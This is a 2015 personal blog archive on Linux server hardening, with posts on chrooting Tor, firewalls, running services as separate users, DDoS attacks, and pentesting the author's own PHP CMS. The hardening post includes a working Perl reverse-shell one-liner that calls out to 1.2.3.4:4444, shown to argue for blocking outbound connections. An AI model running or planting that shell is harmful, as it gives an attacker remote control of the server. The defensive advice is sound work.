Sunday, June 21, 2015

Building a Portable, Chrootable Tor Instance on a Dedicated Development VM

In my last post I talked about various ways of locking down your system to mitigate compromises. One method I mentioned is to chroot programs that run public services. Chrooted programs run in their own little 'sandboxes', or 'jails', which are nothing more than a complete filesystem, containing everything the program needs to run, inside a directory owned by the root user. This limits the program's attack surface because the program, and the user it runs as, can only access files and directories inside its environment. If the program is compromised, the chroot should protect the rest of the system from compromise as well.

While the concept is easy enough to understand, the implementation can be a little tricky. Different distributions of Linux, although running 98% of the same software, have different filesystem structures. It's not exactly difficult to figure out where all those libraries are, but it can be tedious and annoying. That's probably why chroots aren't used as often as they should be. There are some solutions that make the process easier, like Sandfox. There is also debootstrap for Debian systems, although I can't speak for it because I have yet to use it. However, sometimes it's better to accomplish something without installing any extra software, especially if the target system is a production server.

As mentioned in my last post, it is a security risk to have compilers on your system, since they can make things much easier for an attacker. One solution is to compile all your software in a virtual machine, hosted on a dedicated system. I just love virtual machines. They're convenient, forgiving, portable, and disposable. If anything ever goes wrong on a VM, you simply restore the system to a snapshot that you (hopefully) made immediately after installing and configuring it. So, let's set up a virtual development system to run all of our compilers on. Then we will compile and create a portable, chrooted instance of Tor, which we can then run on any server we need.

Ideally, your virtual machines should run on a dedicated system. The system does not have to be terribly powerful, so you could probably use one of those old computers collecting dust in the closet. For my dedicated box, I chose straight headless Debian. I created a separate user to run VirtualBox, and also a separate partition to store and run the virtual machines on, for security. It's best to make sure this partition is of decent size (at least 50 gigs). It's also good to partition the disk ahead of time rather than relying on the installer to do that for you. Setting up a Debian system and installing vboxheadless is beyond the scope of this post, but there are plenty of resources on the net if you need help with that.

Once you have your system running, secure it with SSH and a firewall. Next, install vboxheadless, and phpVirtualBox if you want a nice graphical interface to manage your VMs. Now you just need to create a new virtual machine and install a Linux distro of your choice on it. It doesn't really matter which distro you go with, but for simplicity's sake I'd recommend Ubuntu Server Edition. However, if your physical system has enough resources, it would be beneficial to install a 64-bit version. You can always compile for 32-bit systems on a 64-bit system, but not the other way around.

Now you need to either follow the directions found here to compile Tor in a chroot, or you can use this script that I wrote to do it for you. Note that the script was only tested on an Ubuntu 14.04 i686 system, so your mileage may vary on other distros. Also note that every script I've ever gotten off GitHub for this particular task failed when I ran it, so I won't be surprised if mine fails for you as well. The script also actually creates a functional Tor chroot, which is not really necessary if you just want to compile it for use on other systems. If you follow the directions on the Tor Project site, after you verify that your Tor chroot works, just run:

sudo cp -R -p $TORCHROOT /tmp/tor-chroot
sudo tar -zcvf ~/tor-chroot.tar.gz -C /tmp tor-chroot

And you will have a tar.gz archive that you can simply extract on any Linux server and run. Of course, you will have to add the tor user to that system first:

sudo useradd -d /home/tor -s /bin/false tor

After that's done, you can just run this command to start it:

sudo chroot $TORCHROOT /tor/bin/tor

And finally, follow the instructions on the Tor site to create an init script if you want. This process can be used to create chroots for other programs as well. One last recommendation: record the sha512sum of the resulting archive, and also sign it with your GPG key, so that you can later verify its integrity.
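That last step can be sketched like this. The scratch file below just demonstrates the commands (in practice, substitute the tor-chroot.tar.gz archive created above); the GPG lines assume you already have a signing keypair, so they're shown as comments:

```shell
# Demo on a scratch file; substitute ~/tor-chroot.tar.gz in practice
archive=/tmp/demo-chroot.tar.gz
echo "pretend this is the chroot archive" > "$archive"

# Record the checksum alongside the archive
sha512sum "$archive" > "$archive.sha512"

# Later, before deploying, verify integrity
sha512sum -c "$archive.sha512"

# Signing requires a GPG keypair, so shown here for reference:
# gpg --detach-sign --armor "$archive"
# gpg --verify "$archive.asc" "$archive"
```

Keep the .sha512 and .asc files somewhere other than the server you deploy to, or an attacker who gets in can just regenerate them.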

Saturday, June 20, 2015

Locking Shit Down

I don't know if it's just me, but it seems like there is an awful lot of funny stuff going on in the cloud as of late. After the Sony hacks, I predicted that 2015 would be a bad year for cyber security. Looks like I was right about that, considering every branch of our federal government was hacked recently. Now, I manage a few servers myself, and I've had my share of compromises too. But the last few months have been utterly ridiculous. I have reinstalled my personal system 4 times since January because I suspected some malware had snuck onboard, and I'm getting really sick of doing that. Today I reinstalled & rebuilt yet another server from scratch, which is a major pain in the ass.

This is the server I'd been running a Kippo SSH honeypot on. I had Kippo running for about a month or so, and from that experience I cannot recommend that anyone run a honeypot on a server that they run other services on. It's just not worth the risk. Yeah, Kippo is relatively secure, and sure, it's an emulated shell that is not capable of doing much, but that does not mean it can't be hacked. In the end, if nothing else, it's just another open port to worry about.

Run Public Services On Separate Systems

This should be obvious, but let's narrow the definition of public. When you have a box running a VPN server, BitTorrent server, web server, honeypot, and Tor relay... well, things can get messy. It is definitely more secure to dedicate a system to a particular task, and to manage several smaller systems, than it is to run everything on one big powerful box and attempt to lock it all down. In the age of cheap & abundant virtualization, there's no reason not to segregate your servers. My advice is to at least keep the public services (BitTorrent, web server, Tor, etc.) on a different server than your personal cloud storage box, or what-have-you. Consider a BitTorrent client for a moment. It is generally seen as a pretty low-risk service to run (all legal issues aside), and overall, clients like Transmission have stood the test of time. But BitTorrent clients connect with tens of thousands of different hosts every day, and all it takes is a few bad packets and a zero-day exploit to ruin your day. Torrent clients also seem to be written specifically to evade firewalls, as they work just fine under very strict rules. You don't even need to open a port; the program will figure out a way to connect to the peer, wherever they are.

Deny Outbound Connections

In this day and age, it's no longer sufficient to leave your firewall's outbound policy at ACCEPT while dropping inbound connections. Why? Imagine you're running a webserver of some sort, and somebody finds an exploit that allows them to upload even one line of rogue PHP (this happens all the time). For example, if the following manages to get written to a file on your server, and your outbound policy is set to ACCEPT, the attacker will get a shell with whatever privileges the server user has:


perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"1.2.3.4:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

If your system is not fully up to date (or even if it is), all it takes is some privilege escalation exploit, or a slight misconfiguration of permissions in the serving directory, and you are screwed. By the way, I tested this on a fresh Ubuntu 14.04 server, running Apache as it is out of the box, with success. Most Linux systems have Perl installed, and removing it is a real pain (too many services depend on Perl, and besides, Perl is cool!). Denying outbound connections would prevent this from working, and chrooting Apache would severely limit the attack surface as well. If you think this is paranoia, try googling something like "inurl:/r00t.php".

For locking down an Apache server that only serves clients on a particular private subnet, you could use something like this:

$IPT -A INPUT -i eth0 -s 10.0.0.0/24 -d 10.0.0.1 -p tcp -m tcp --dport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -s 10.0.0.1 -d 10.0.0.0/24 -p tcp --sport 80 -j ACCEPT
$IPT -A OUTPUT -o eth0 -m owner --uid-owner www-data -j REJECT
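Going a step further, you can flip the default policies themselves to DROP and explicitly allow only what you need. A minimal sketch, assuming $IPT points at the iptables binary like in the rules above and that the state match module is available; add your own SSH/management rules before applying this on a remote box, or you'll lock yourself out:

```shell
IPT=/sbin/iptables

# Default deny in every direction
$IPT -P INPUT DROP
$IPT -P OUTPUT DROP
$IPT -P FORWARD DROP

# Loopback traffic is needed by lots of local software
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A OUTPUT -o lo -j ACCEPT

# Allow replies to connections that were already permitted
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
```

With that in place, the perl one-liner above never reaches its listener, because the new outbound connection matches nothing and hits the DROP policy.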
 


Run Everything as a Different User

This should be number one. Considering the example above, when an attacker manages to get a shell on your system, they are limited to the resources running as, and owned by, that user. If you implement proper access control policies, then even if someone manages to get a shell, they will not be able to access the files and programs owned by other users. Our old friend Mr. Meterpreter is a perfect example of how privilege separation could have saved a lot of systems from rape and pillage. When someone manages to get a Meterpreter trojan onto your Windows system, it is game over. Your webcam, microphone, 'My Documents' folder, and usually most of your C:\ drive are accessible by you, the user. Yeah, I know that's just how personal computers work, but it's also a good reason to use Linux and lock your shit down. The functionality of Metasploit's Meterpreter on a Linux machine is much, much more limited than it is on a Windows system, mostly because of privilege separation.
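In practice that means giving every service its own unprivileged account. A quick sketch (the username 'webapp' is just an example, and this needs root):

```shell
# Dedicated system account: no home directory, no login shell
sudo useradd --system --no-create-home --shell /usr/sbin/nologin webapp

# Then run the service as that user, e.g. from its init script:
# sudo -u webapp /path/to/service
```

The nologin shell means that even if an attacker gets the account's credentials, they can't log in interactively; they only ever get whatever the service itself exposes.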

Chroot Everything Else

Another priceless tip is to chroot the services that are open to the world. I don't understand why chrooting is not used more often. A strong chroot combined with a strict firewall should be enough to stop most attackers before they can do any real harm. Chroots are basically 'jails' for programs. A chroot consists of a directory owned by root, with an entire miniature Unix filesystem inside it. So, for a Tor chroot, you'd have for instance '/chroot' owned by root, and then '/chroot/tor' owned by a user with limited privileges and no valid shell. Then you would use the ldd command to figure out which libraries Tor depends on, and you'd copy them all into the /chroot/tor/ directory, so you'd have '/chroot/tor/var', '/chroot/tor/lib', '/chroot/tor/etc', etc... If a hacker manages to break into the chroot, they can do as much damage as they want to the Tor service, but nothing else. That's the theory, at least.
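The ldd step can be scripted. Here's a rough sketch that copies a binary, plus every shared library ldd reports, into a chroot directory while preserving paths. It's demonstrated on /bin/sh since the location of your compiled Tor binary varies; substitute your real binary and chroot path (it also assumes no library paths contain spaces, which holds on normal systems):

```shell
#!/bin/sh
CHROOT=/tmp/demo-chroot   # use something like /chroot/tor in practice
BIN=/bin/sh               # substitute the tor binary you compiled

mkdir -p "$CHROOT/bin"
cp "$BIN" "$CHROOT/bin/"

# ldd prints each dependency with its resolved path; copy each one
# into the chroot under the same directory it came from
ldd "$BIN" | grep -o '/[^ ]*' | while read -r lib; do
    mkdir -p "$CHROOT$(dirname "$lib")"
    cp "$lib" "$CHROOT$(dirname "$lib")/"
done

ls "$CHROOT/bin"
```

After that, `sudo chroot "$CHROOT" /bin/sh` should drop you into a shell that can see nothing outside the jail. For a real service you'd also create the /etc, /var, and device nodes it needs, which is the tedious part the post is talking about.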

Edit: A note on chroots. A chroot can easily be created for most occasions with the program Sandfox, which is written entirely in bash, so it works on all Linux systems and possibly even Macs. It's perfect for chrooting Firefox, which will drastically improve your defenses against client-side attacks on desktop systems.

Use a Password Manager

Keyloggers are pretty useless when you don't type. Password managers are excellent because you can generate, copy, and then paste a password where it's needed, and never have to type the password itself. Yes, there are some advanced trojans out there that can read the clipboard (and some not-so-advanced ones on Android systems...), but generally this is a really good move. It's also a lot easier to have /dev/urandom come up with your passwords than it is to invent your own totally random, 40-character strings. If at all possible, don't even use passwords, or use some kind of two-factor authentication system. Even in 2015, weak passwords are still one of the most common mistakes leading to full system compromise.
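For example, a quick way to have /dev/urandom hand you a 40-character password (the character set here is just an example; adjust it to whatever the site accepts):

```shell
# Pull random bytes, keep only the characters we want, stop at 40
tr -dc 'A-Za-z0-9_!@#%^&*' < /dev/urandom | head -c 40; echo
```

tr's -dc flags delete everything NOT in the set, so the output is uniformly drawn from those characters, and head cuts it off at 40 of them.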

Use Separate Partitions

This should be a no-brainer, but it's just not. Even the Debian installer still struggles to properly partition a disk with separate /var, /tmp, /usr, /home, /root & /boot partitions. Usually the installer fails because it does not allocate enough space to the root partition, and the system will not fit on the drive. I really wish someone would fix that. The solution is to partition the drive yourself before you install. Use something like a GParted live disc, because IME the installer's built-in partitioner really sucks. When you have, for example, /tmp on its own partition, you can set options like nodev, nosuid, and noexec for that partition. This goes a hell of a long way toward keeping your system secure. /tmp is generally world readable, writable and executable, and is almost always where a hacker will first try to download their malware after getting a shell.
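With /tmp on its own partition, those options go in /etc/fstab. A sketch (the device name is an example; use your actual partition):

```
# /etc/fstab entry for a dedicated /tmp partition
/dev/sda3  /tmp  ext4  defaults,nodev,nosuid,noexec  0  2
```

Then `sudo mount -o remount /tmp` applies it without a reboot. One caveat: noexec on /tmp can break some package installs, since apt sometimes runs maintainer scripts there, so test before you rely on it.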

Uninstall/Disable Whatever You Don't Need

The more applications running on any given system, the more code there is to mess with, and hence the more attack vectors. If you don't need a print server, get rid of CUPS! If you don't use RPC services, get rid of rpcbind. If you don't need service discovery, get rid of avahi. You get the point. Oh, one last thing... if you don't compile your own code, uninstall the compilers! It's often easier to upload a text file than a binary file, particularly in the web app world.

Edit: Personally, I need the compilers, so instead of removing them, you can just limit their execution to the superuser:

~: dpkg --list | grep compiler
ii  g++                           4:4.9.2-2ubuntu2   amd64   GNU C++ compiler
ii  g++-4.9                       4.9.2-10ubuntu13   amd64   GNU C++ compiler
ii  gcc                           4:4.9.2-2ubuntu2   amd64   GNU C compiler
ii  gcc-4.9                       4.9.2-10ubuntu13   amd64   GNU C compiler


~: cd /usr/bin
~: chmod 750 g++-4.9 gcc-4.9
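One caveat: a plain chmod on files owned by a package gets reverted the next time that package is upgraded. On Debian/Ubuntu, dpkg-statoverride makes the restriction stick (the versioned filenames match the dpkg listing above; adjust them to whatever your system actually shows):

```shell
# Persistently restrict the compiler binaries to root (mode 0750)
sudo dpkg-statoverride --update --add root root 0750 /usr/bin/gcc-4.9
sudo dpkg-statoverride --update --add root root 0750 /usr/bin/g++-4.9
```

Run `dpkg-statoverride --list` to see what overrides are in effect, and `--remove` to undo one.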

Wednesday, June 10, 2015

DDoS'ing Someone is Not an Effective Way to Send a Message

Over the past few months, I have been getting emails from one of my VPS providers informing me that I am constantly under DDoS attack. Sometimes it will happen once a week, other times up to 3 times in one day. Since the server is behind my provider's insanely awesome firewall, I seldom notice any performance degradation. However, there are those rare occasions when the attacks get really bad, and my provider will shut the server down for a few minutes, which has disrupted my work.

I got an email from them today informing me that I was DDoS'd 3 times yesterday, and once today. They also asked me if I knew why I was being attacked so frequently. That's the first time anyone's ever asked me that. I replied, "I have no idea... I wish I knew!" It's reminiscent of the 5-day attack on GitHub from China, in that the maintainers of GitHub had absolutely no idea why they were being attacked. They said something like, "that's the frustrating thing about DDoS attacks-- it's impossible to know what the motive is."

Yeah, that about sums it up. It takes an awful lot of effort and coordination to organize an attack like this, and if it's going to be effective, it will generally require hundreds of machines, at least. I've considered putting a message board on the server with a form asking, "Who the fuck are you, and what do you want?"

... But that would probably just open up another attack vector for them to use against me, whoever they are. It's like holding somebody captive for ransom and failing to send a note explaining what you want... Perhaps there is no message. I thought maybe it's a rival VPS provider trying to get customers to switch over to them, but if that were the case, wouldn't it be more effective to attack the VPS farm's gateway instead of one of the clients? I also checked my spam folder, and there are no letters from VPS providers soliciting a service, so that probably isn't the case. And according to my provider, I am, with certainty, the target.

I only wish I knew why I am being targeted. Every time this happens, I ask them if they'd give me the IP addresses of the attackers, because I am curious to see which country they're coming from. So far, they have not told me. It's difficult to figure out where the attacks are coming from by looking at the kernel logs, because the attacks are filtered by the provider's firewall before they ever hit me. So I have to resort to guessing, again...

Tuesday, June 2, 2015

Yes, Bad Stuff Happens on Linux, But it Doesn't Have To

Not to diss on the kernel, but this notion needs to be addressed. Quite frequently on the community forums, when someone asks a question about potentially having malware on their box, about 9 times out of 10 someone with a big reputation comes along and says something like, "I would not worry about it, you're not on Windows anymore." Then, 8 times out of 10, the person who started the thread says "OK", and no further investigation is done. This is a dangerous attitude, and it's simply not true.

There is always that guy (you know the one) who drops in with his 20,000 reputation and 100 badges and says, "I've been using Unix for 30 years now, and in all that time I have never actually seen a rootkit, only false positives." Well, I have only been using Linux for 3 or 4 years, and I've seen malware. In fact, just last night I found something that looked a lot like malware on one of my own systems. In order to do so, I had to boot to a Kali live disk and run some extensive tests. Both chkrootkit and rkhunter initially only gave me a bunch of warnings, but then I ran this command...

chkrootkit -x | egrep '^/'

...which finds strings inside binaries, and I was absolutely shocked at what I saw. Many programs in /bin had been replaced by symlinks that were very difficult to navigate because they were very complex, linking through many directories before ending up at /etc/alternatives or /etc/.java (don't ignore those unnecessary compiler warnings). I saved the output of that command (which was 1.7 MB long), but unfortunately, I seem to have lost the file, which sucks because I really wanted to show you what I'm talking about. I guess you'll have to take my word for it. Usually this happens because of bad security practices, but I take insane security precautions! I use 40-character random strings for all passwords, have really tight firewall rules, run Linux, use 4096-bit RSA keys for SSH (wish ECDSA would work), etc. The truth is I don't know how it happened, but I intend to find out. So after I fixed that server, I started trying to exploit all my own servers and the services running on them. So far, it's been pretty eye-opening.
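If you want a quick manual version of that check, without chkrootkit, you can just list the symlinks sitting directly in the binary directories and eyeball where they resolve. Keep in mind plenty of symlinks there are legitimate (sh pointing at dash, the /etc/alternatives system, and so on); it's the weird, multi-hop ones pointing at hidden directories you're after:

```shell
# List every symlink directly under /bin and /usr/bin with its target
find /bin /usr/bin -maxdepth 1 -type l -exec ls -l {} + 2>/dev/null
```

Comparing that output against a known-good system of the same distro and release makes the oddballs stand out fast.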

When one starts to learn about offensive security, one realizes computers are really vulnerable when misconfigured (or lazily configured). I never really liked the idea of the whole cat-and-mouse, crack-and-patch approach to security. I figured that if you just build the damn thing from the ground up with security as the first priority, then you are good. And, yeah, that turned out to be true. However, that approach does not work if you are, for instance, using someone else's content management system. You might do that because you don't feel like studying the PHP manual for 6 weeks before launching your own blog. I hear you.

Recently I deployed a PHP CMS without pentesting it first. When I finally did pentest the site, I discovered multiple severe vulnerabilities, including remote OS command injection. I was even running mod_security (but had not taken the time to read that manual either). I scanned it with skipfish, discovered some low-threat XSS vulnerabilities, and it didn't seem like a big deal. But then I scanned it with OWASP ZAP, which is like Metasploit Community Edition for HTTP servers. This program gave me exactly the information I needed to both exploit my site and fix it.

One reason I chose this CMS is because I fucking hate SQL, and this app did not need it. SQL is a nightmare, and probably the most exploited technology on the net today. Have you ever tried to salvage a corrupt database? Nooo thanks. But PHP configured the way it is out of the box is a recipe for disaster. It's a great example of default permit. For God's sake, the developers ought to ship it with command execution disabled. If someone needs that feature, they should have to enable it themselves so that they understand the risks.

Anyway, a few hours of Googling, and I had most of the vulnerabilities on the site patched. The patches were all very simple things like setting the correct HTTP headers, cache controls, mod_security & php.ini directives, blah blah. I barely had to edit any of the actual PHP. So, crack and patch has its place. But there is definitely no substitute for building your program securely, and your mantra should be default deny.
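For reference, the php.ini side of that hardening looks something like this. The disable_functions list is a common example, not exhaustive, and some apps legitimately need a few of these, so check what your CMS actually calls before disabling:

```
; Disable OS command execution and other risky defaults
disable_functions = exec,passthru,shell_exec,system,proc_open,popen
expose_php = Off
allow_url_include = Off
display_errors = Off
```

Restart the web server (or php-fpm) after editing, and re-run your scanner to confirm the command injection is actually dead.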

On the age-old 'Linux can't get malware' argument, I say yes it can, but it does not have to. Linux has more than enough tools you can use to prevent these kinds of things from happening, and they're all free. On a closed platform like Microsoft Windows, which also happens to have a huge multi-billion-dollar antivirus industry that depends on those insecurities, bad things will happen. But on an open-source, community-driven platform with an incentive to function correctly, bad things generally only happen if you let them. I suppose the biggest lesson I've learned thus far with the offensive approach is to not trust other people's code. Besides, it's pretty fun (and totally legal) to try to exploit that code when it's running on your own server. That's all for today.